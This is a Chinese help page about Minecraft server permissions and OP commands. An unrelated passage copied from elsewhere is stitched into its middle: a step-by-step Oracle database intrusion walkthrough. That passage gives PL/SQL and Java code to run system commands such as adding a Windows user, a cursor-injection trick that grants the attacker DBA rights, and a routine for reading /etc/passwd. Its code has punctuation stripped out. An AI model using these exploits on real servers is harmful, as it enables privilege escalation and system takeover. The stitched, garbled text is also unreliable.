minecraft服务器权限如何设置

spawn

传送到主城

/register

密码

#注册账号

/login

密码

#登陆账号

/money

#查看金钱

/psy

名字

钱数

给予别人金钱

/sethome

#设置自己的家

/home

#回到自己设置的家

/spawn

#传送到出生点

/back

#回到上一次传送点(例如死后回尸体处)

[private]

物品上锁

把木牌放到箱子前，输入：

第一行：[Private]

第二行：空

第三行：可以用这个箱子的其他人

第四行：可以用这个箱子的其他人

/getpos

#显示坐标

/setwarp

[warp点]

#设置公共传送点

/warp

[warp点]

#传送到指定传送点

/tpa

<玩家ID>

#请求传送到玩家player所在位置

/tpahere

<玩家ID>

#请求玩家player传送到自己所在位置

/tpaccept

#接受玩家传送的请求

/tpdeny

#拒绝玩家传送的请求

/res

create

[领地名]

-

选择好区域后创建一个叫做[领地名]的领地

/res

remove

[领地名]

-

移除一个叫[领地名]的领地

/res

removeall

-

移除所有领地

/res

subzone

<领地名>

[子区域名]

-

在领地内创建一块子区域，你必须是所有者才行。

/res

info

[领地名]

-

查询领地权限

以下为权限设置(true为开启，false为关闭)

/res

set

【领地】

【具体权限】

true/false

将你的领地设定权限是否开启

/res

pset

【领地】

【玩家名字】

【具体权限】

true/false

将你的领地开放或关闭给某玩家一个具体的权限

admin：领地的全权管理权限，仅能给与某玩家

container：是否能使用箱子，发射器等

bucket：设置是否能使用桶

ignite：点火的权限

piston：活塞是否能使用

build：建造权限(包括destroy和place)

destroy：毁坏权限

place：放置权限e

move：进入权限

tp：传送权限

use：使用权限(工作台，炉子等)

subzone：是否能设置子空间

tnt：设置tnt是否有效

creeper：设置JJ怪是否有效(设置F的话JJ怪就废了)

damage：设置领地内是否能造成伤害(不能防止被挤死)

monsters：设置是否刷新怪物

animals：设置是否刷新动物

firespread：火是否能蔓延

flow：液体流动，包括waterflow和lavaflow

waterflow：水的流动

lavaflow：岩浆流动

healing：设置是否能恢复生命

pvp：设置是否能pvp

求采纳

很快便连接上oracle服务器 此时发现

连接后不是dba权限

不能利用SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES漏洞提升权限

运行SELECT UTL_HTTP request( ) FROM dual 后发现oracle服务器不能连接网络

幸运的是

运行

create or replace function Linx_Query (p varchar ) return number authid current_user is begin execute immediate preturn end

成功!这个用户具有create proceduce权限

此时马上想到创建java扩展执行命令

create or replace and pile java source named LinxUtil as import java io *public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime getRuntime() exec(args) getInputStream() ) )String stemp str= while ((stemp = myReader readLine()) != null) str +=stemp+ myReader close()return str} catch (Exception e){return e toString()}}}

begin dbms_java grant_permission( PUBLIC SYS:java io FilePermission <>execute )end

create or replace function LinxRunCMD(p_cmd in varchar ) return varchar as language java name LinxUtil runCMD(java lang String) return String

select * from all_objects where object_name like %LINX%

grant all on LinxRunCMD to public

select LinxRunCMD( cmd /c net user linx /add ) from dual

但是在第一步就卡住了 服务器由于某种未知原因 不能创建java扩展!!

还好 我们还有UTL库可以利用

create or replace function LinxUTLReadfile (filename varchar ) return varchar is

fHandler UTL_FILE FILE_TYPE

buf varchar ( )

output varchar ( )

BEGIN

fHandler := UTL_FILE FOPEN( UTL_FILE_DIR filename r )

loop

begin

utl_file get_line(fHandler buf)

DBMS_OUTPUT PUT_LINE( Cursor: ||buf)

exception

when no_data_found then exit

end

output := output||buf||chr( )

end loop

UTL_FILE FCLOSE(fHandler)

return output

END

UTL_FILE_DIR需要先用

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc

指定目 但运行后发现没有权限 只好想办法提权

***************游标注射***************

老外写了N个pdf介绍这技术 我精简了代码

DECLARE

MYC NUMBER

BEGIN

MYC := DBMS_SQL OPEN_CURSOR

DBMS_SQL PARSE(MYC declare pragma autonomous_transactionbegin execute immediate GRANT DBA TO linxlinx_current_db_user mitend)

DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)

BEGIN SYS LT FINDRICSET( ||dbms_sql execute( ||MYC|| )|| )– x )END

raise NO_DATA_FOUND

EXCEPTION

WHEN NO_DATA_FOUND THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)

WHEN OTHERS THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC)

END

运行后重新连接就有dba权限了 简单吧……

现在可以读取文件了

CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc

select LinxUTLReadfile( passwd ) from dual

lishixinzhi/Article/program/Oracle/201311/16747

服务器CMD设置：在开启服务器后有一个CMD指令框，玩家们只要在CMD中输入OP 玩家ID，即可给这名玩家添加OP权限。游戏中添加：游戏中持有OP权限的玩家，可以在对话框中输入/op 玩家ID，来给予其他玩家OP权限。

服务器文件修改：在服务器文件列表中有一个Ops.txt的文件夹，在文件夹中输入需要OP权限的玩家ID保存即可。游戏创始人为马库斯·佩尔松，也称为notch，其灵感源于《无尽矿工》､《矮人要塞》和《地下城守护者》。

玩家可以在游戏中的三维空间里创造和破坏各种各样的方块，甚至在多人服务器与单人世界中体验不同的游戏模式，在高度的自由中，玩家们也自己创作出了大大小小的玩法，打造精美的建筑物，创造物和艺术品。且游戏平台已囊括了移动设备和游戏主机。

---